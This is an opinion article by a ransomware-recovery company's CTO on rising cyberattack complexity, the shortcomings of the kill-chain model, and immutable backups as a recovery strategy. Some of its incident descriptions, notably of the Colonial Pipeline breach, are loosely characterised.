Cyberattacks are becoming increasingly complex because organizations are more interconnected than ever before while threat actors are better resourced and digital environments are harder to defend.
The ability to prevent an attack — and more importantly, fully recover from one — is no longer about guarding a perimeter. For a chief technology officer, a strong security program is about managing a dynamic, continuous and highly unpredictable IT risk environment.
Complex attacks in the news
We can see this sort of complexity going back to 2021 involving the Colonial Pipeline attack. The breach affected computerized equipment managing the pipeline, disrupting the delivery of petroleum products across much of the southeast United States. This suspected nation-state attack focused on reconnaissance and long-term access rather than an immediate ransomware demand.
The Colonial Pipeline breach was complex in that attackers gained access through a compromised password for a VPN account. In fact, the attack required advanced knowledge of industrial control system protocols and SCADA (supervisory control and data acquisition) systems.
Fast-forward to May 2025 when Alphabet reported that since the start of the year the Russian state-backed ColdRiver hacking group had been using new LOSTKEYS malware to steal files and login credentials in espionage attacks targeting Western governments, journalists, think tanks and non-governmental organizations. LOSTKEYS has proven capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker.
Digging deeper into the complexity of cyber threats, attackers often combine several techniques, such as phishing, social engineering, malware, lateral movement, privilege escalation and data exfiltration, across different systems and platforms. Their intent is to evade detection and maximize impact by stealing and encrypting data even before launching ransomware.
When threat actors use AI to craft convincing phishing emails and find vulnerabilities, it increases their efficiency, helps scale attacks and makes detection harder. Today, it’s not uncommon to see polymorphic malware that adapts to evade antivirus tools. Malware often uses encryption, living-off-the-land binaries (LOLBins), fileless techniques, or operate only in memory, which reduce the chances of being detected by traditional security tools.
Nation-state and organized criminal groups continue to employ coordinated, well-funded campaigns with custom malware and deep reconnaissance. Their tactics employ espionage and sabotage to exact financial gain and foment geopolitical disruption.
CTOs must stay ahead of advancing threat actor tactics
With increasingly complex attacks in mind, a CTO must be immersed in knowledge about the current threat landscape — especially concerning what may lie around the corner. Advanced Persistent Threats (APTs), which focus on stealing data and compromising critical systems, and ransomware-as-a-service attacks whereby threat actors can purchase ready-made attack tools, are growing in sophistication.
Attackers now commonly target third-party vendors and software dependencies to compromise multiple organizations at once. And more of them are now using AI and automation to scale phishing, evade detection and exploit vulnerabilities faster.
The expanding attack surface particularly heightens vulnerabilities involving:
- Cloud infrastructure. As organizations migrate to the cloud, misconfigurations, unsecured APIs and hybrid setups create new vulnerabilities. It’s also challenging to protect and recover data in cloud infrastructure.
- Remote and hybrid workforces. Increased use of personal devices and public networks expands the perimeter and weakens traditional defenses. Home offices and personal devices must be considered among those that can be compromised.
- IoT and OT devices. These devices often lack strong security protocols, making them ideal entry points for attackers.
The human factor complicates security through evolving social engineering tactics. Many breaches still stem from phishing and user error. Threat actors go after your users as well as your IT help desk. Therefore, continuous security awareness training is critical and one of a CTO’s most important responsibilities. But let’s not put all the responsibility on an individual employee.
Of course, finding and retaining skilled security professionals is increasingly challenging. Therefore, CTOs must align cybersecurity spending with risk exposure and business goals, advocating for investment in modern tools and a well-intentioned system of hardening defenses.
Re-examining the traditional cyber kill chain
The traditional cyber kill chain (MITRE ATT&CK, NIST, CIS) has been influential in framing the advanced tactics involved in cyberattacks as a sequence of predictable stages, from reconnaissance to exfiltration. However, in today’s threat landscape it falls short in several important ways:
- Linear, Static Model. Modern attacks are dynamic, iterative and non-linear.
- Focus on Perimeter Defense. Heavy focus on preventing initial access allows threat actors to bypass perimeter defense. The focus should be on recovery over resistance. However, organizations make the mistake of prioritizing resistance over recovery.
- Lack of Post-Exploitation Focus. Modern attacks persist and adapt post-exploitation, maintaining stealthy access while pivoting across networks.
- Assumes Single Vector Attacks. Adversaries use multi-vector attacks (e.g., phishing, lateral movement and privilege escalation).
- Ignores Insider Threats. Security teams focus on external adversaries. However, threat actors commonly gain access to sensitive controls and ingress points, appearing like an insider. If someone on your IT staff can pose a threat, so can a threat actor.
- Failure to Address Common Cloud & Hybrid Environments. The kill chain was designed for the on-premises environment. Modern attacks target cloud, SaaS and hybrid infrastructures, which require different detection and response strategies.
- Understanding Defense Evasion Techniques. The assumption is that detection occurs in early stages, but the reality is attackers deploy “user” and commercially available methods to access systems and data, such as VPN, Citrix, Horizon, TeamViewer, Quick Assist, ScreenConnect, etc.
- Inability to Handle Lateral Movement. Minimal focus on movement within the network post-breach allows attackers to leverage credential harvesting, pass-the-hash, and kerberoasting (a technique to obtain a password hash of an Active Directory account).
- Delayed Detection & Response. Kill chain disruption tactics prioritize prevention and detection. However, assumption of breach focuses on recovery as a primary means of disruption.
- Misses Targeted Attacks and APTs. Assumption of mass-scale attacks, with predictable patterns, allows customized attacks based on target environments, staying undetected for longer periods.
If your organization assumes, rightly, that a breach can occur, then a modern defense logically solves in reverse, mapping the attack path backwards from assets. Therefore, defend what matters most, not just what’s convenient, while continually conducting tabletop exercises to simulate the most complex attacks.
Protecting data is your best defense
It’s important to remember that no cyber defense program is perfect. Without the proper orchestration of immutable data back-up technology an organization risks significant operational disruption, financial loss, permanent damage to its IT systems and reputational harm. Immutability means that your information is fully recoverable should a breach occur. While you can’t always prevent a cyberattack, your recovery can be assured by deploying multiple backups that your adversaries cannot touch no matter how sophisticated their tactics are.
An effective CTO is one who acts as a cyber risk strategist, technology enabler and change agent. A CTO must ensure security is embedded in every layer of the business. It’s about creating a resilient, adaptive and security-conscious organization, not just buying into the latest tools and hoping they all work well together.
About the Author
Brandon Williams is Chief Technology Officer of Chattanooga, Tennessee-based Fenix24, the world’s first civilian cybersecurity force and an industry-leading ransomware restoration and recovery company. Brandon has more than 20 years of experience in networking, infrastructure design, implementation and security. He finds the most rewarding experiences are blending technology with security, providing resilience to the business while maintaining excellent user experience.
Brandon can be reached on LinkedIn and Fenix24’s company website
